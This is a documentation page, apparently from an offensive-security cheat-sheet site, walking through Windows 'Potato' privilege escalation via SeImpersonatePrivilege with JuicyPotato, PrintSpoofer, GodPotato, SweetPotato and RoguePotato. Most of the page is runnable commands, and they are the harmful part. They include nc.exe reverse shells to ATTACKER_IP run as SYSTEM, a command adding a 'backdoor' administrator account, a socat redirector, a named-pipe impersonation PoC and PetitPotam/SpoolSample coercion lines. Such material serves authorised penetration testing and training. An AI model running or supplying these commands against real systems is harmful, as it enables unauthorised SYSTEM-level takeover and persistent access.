> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Potato Attacks

> Privilege escalation via token impersonation: JuicyPotato, PrintSpoofer, GodPotato, SweetPotato, and RoguePotato.

## Overview

Potato attacks exploit **SeImpersonatePrivilege** or **SeAssignPrimaryTokenPrivilege** to escalate from a service account (IIS, MSSQL, etc.) to SYSTEM.

### Check Privileges

```cmd theme={"dark"}
whoami /priv
```

```powershell theme={"dark"}
whoami /priv | findstr /i "impersonate assign"
```

If either is **Enabled** → potato attacks viable.

| Privilege                       | Required by                                                    |
| ------------------------------- | -------------------------------------------------------------- |
| `SeImpersonatePrivilege`        | JuicyPotato, PrintSpoofer, GodPotato, SweetPotato, RoguePotato |
| `SeAssignPrimaryTokenPrivilege` | JuicyPotato                                                    |

<Note>
  Service accounts like `IIS APPPOOL`, `NT AUTHORITY\LOCAL SERVICE`, `NT AUTHORITY\NETWORK SERVICE`, and SQL Server accounts typically have these privileges by default.
</Note>

***

## Which Potato to Use

| Tool             | Windows Version                      | Notes                                                       |
| ---------------- | ------------------------------------ | ----------------------------------------------------------- |
| **JuicyPotato**  | 7, 8, 10 (\< 1809), Server 2008–2016 | Needs valid CLSID                                           |
| **RoguePotato**  | 10, Server 2019                      | Needs attacker-controlled machine                           |
| **PrintSpoofer** | 10, Server 2016/2019                 | Simplest, abuses print spooler                              |
| **GodPotato**    | All (.NET 2.0+)                      | Works on 2012–2022, most universal (NET2/NET35/NET4 builds) |
| **SweetPotato**  | 10, Server 2016/2019                 | Combines multiple techniques                                |

***

## Download

### Kali Linux

```bash theme={"dark"}
ls /usr/share/windows-resources/juicy-potato/
# /usr/share/windows-resources/juicy-potato/JuicyPotato.exe
```

### GitHub

```bash theme={"dark"}
# JuicyPotato
https://github.com/ohpe/juicy-potato/releases

# PrintSpoofer
https://github.com/itm4n/PrintSpoofer/releases

# GodPotato
https://github.com/BeichenDream/GodPotato/releases

# SweetPotato
https://github.com/CCob/SweetPotato/releases

# RoguePotato
https://github.com/antonioCoco/RoguePotato/releases
```

### Check Architecture

```cmd theme={"dark"}
wmic os get osarchitecture
```

***

## JuicyPotato

Abuses COM servers with CLSID to impersonate SYSTEM token.

### Basic Usage

```cmd theme={"dark"}
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami" -t *
```

### Reverse Shell

```cmd theme={"dark"}
JuicyPotato.exe -l 1337 -p C:\Windows\Temp\nc.exe -a "-e cmd.exe ATTACKER_IP 4444" -t *
```

### With Specific CLSID

```cmd theme={"dark"}
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * -c {CLSID}
```

### Finding Valid CLSIDs

```powershell theme={"dark"}
# Test common CLSIDs
# Full list: https://ohpe.it/juicy-potato/CLSID
```

Common working CLSIDs:

| OS                  | CLSID                                    |
| ------------------- | ---------------------------------------- |
| Windows 10          | `{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}` |
| Windows Server 2016 | `{8BC3F05E-D86B-11D0-A075-00C04FB68820}` |
| Windows Server 2012 | `{e60687f7-01a1-40aa-86ac-db1cbf673334}` |

<Warning>
  JuicyPotato does NOT work on Windows 10 build 1809+ and Server 2019+. Use PrintSpoofer or GodPotato instead.
</Warning>

***

## PrintSpoofer

Abuses the print spooler service to capture SYSTEM token. Simpler than JuicyPotato.

### Interactive SYSTEM Shell

```cmd theme={"dark"}
PrintSpoofer.exe -i -c cmd
```

### Execute Command as SYSTEM

```cmd theme={"dark"}
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"
```

### Reverse Shell

```cmd theme={"dark"}
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```

***

## GodPotato

Works on most modern Windows versions. Needs .NET Framework 2.0+ — pick the matching binary (`GodPotato-NET2.exe` / `GodPotato-NET35.exe` / `GodPotato-NET4.exe`).

### Check .NET Version

```cmd theme={"dark"}
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" /v Version
```

### Execute Command

```cmd theme={"dark"}
GodPotato.exe -cmd "cmd /c whoami"
```

### Reverse Shell

```cmd theme={"dark"}
GodPotato.exe -cmd "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
```

### Add Admin User

```cmd theme={"dark"}
GodPotato.exe -cmd "net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add"
```

***

## SweetPotato

Combines multiple potato techniques (EfsPotato, PrintSpoofer, JuicyPotato).

### Execute Command

```cmd theme={"dark"}
SweetPotato.exe -p C:\Windows\System32\cmd.exe -a "/c whoami"
```

### Reverse Shell

```cmd theme={"dark"}
SweetPotato.exe -p C:\Windows\Temp\nc.exe -a "-e cmd.exe ATTACKER_IP 4444"
```

***

## RoguePotato

For Windows 10 1809+ / Server 2019. Requires attacker-controlled machine for OXID resolution.

### Attacker (redirect port 135)

```bash theme={"dark"}
socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999
```

### Victim

```cmd theme={"dark"}
RoguePotato.exe -r ATTACKER_IP -e "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" -l 9999
```

***

## Named Pipe Impersonation

The primitive behind potato attacks: create a named pipe, trick a privileged process into connecting, then impersonate its token (requires `SeImpersonatePrivilege`).

### PowerShell PoC

```powershell theme={"dark"}
$pipe = New-Object System.IO.Pipes.NamedPipeServerStream("pwned", [System.IO.Pipes.PipeDirection]::InOut)
$pipe.WaitForConnection()
# Client connects → impersonate
$pipe.RunAsClient({ whoami })
```

### Coerce Privileged Auth

Force a machine/service account to authenticate to your pipe:

```bash theme={"dark"}
# SpoolSample (print spooler)
SpoolSample.exe TARGET ATTACKER

# PetitPotam (EFS)
python3 PetitPotam.py ATTACKER TARGET
```

Capture with Responder or relay with ntlmrelayx. For domain coercion/relay chains, see [PetitPotam](/active-directory/attacks/petitpotam) and [NTLM Relay](/active-directory/attacks/ntlm-relay).

***

## Quick Decision

```
whoami /priv → SeImpersonatePrivilege enabled?
│
├─ Windows 10 < 1809 / Server 2016 → JuicyPotato
├─ Windows 10 1809+ / Server 2019  → PrintSpoofer or GodPotato
├─ .NET 2.0+ available             → GodPotato (most universal)
└─ Need external listener          → RoguePotato
```
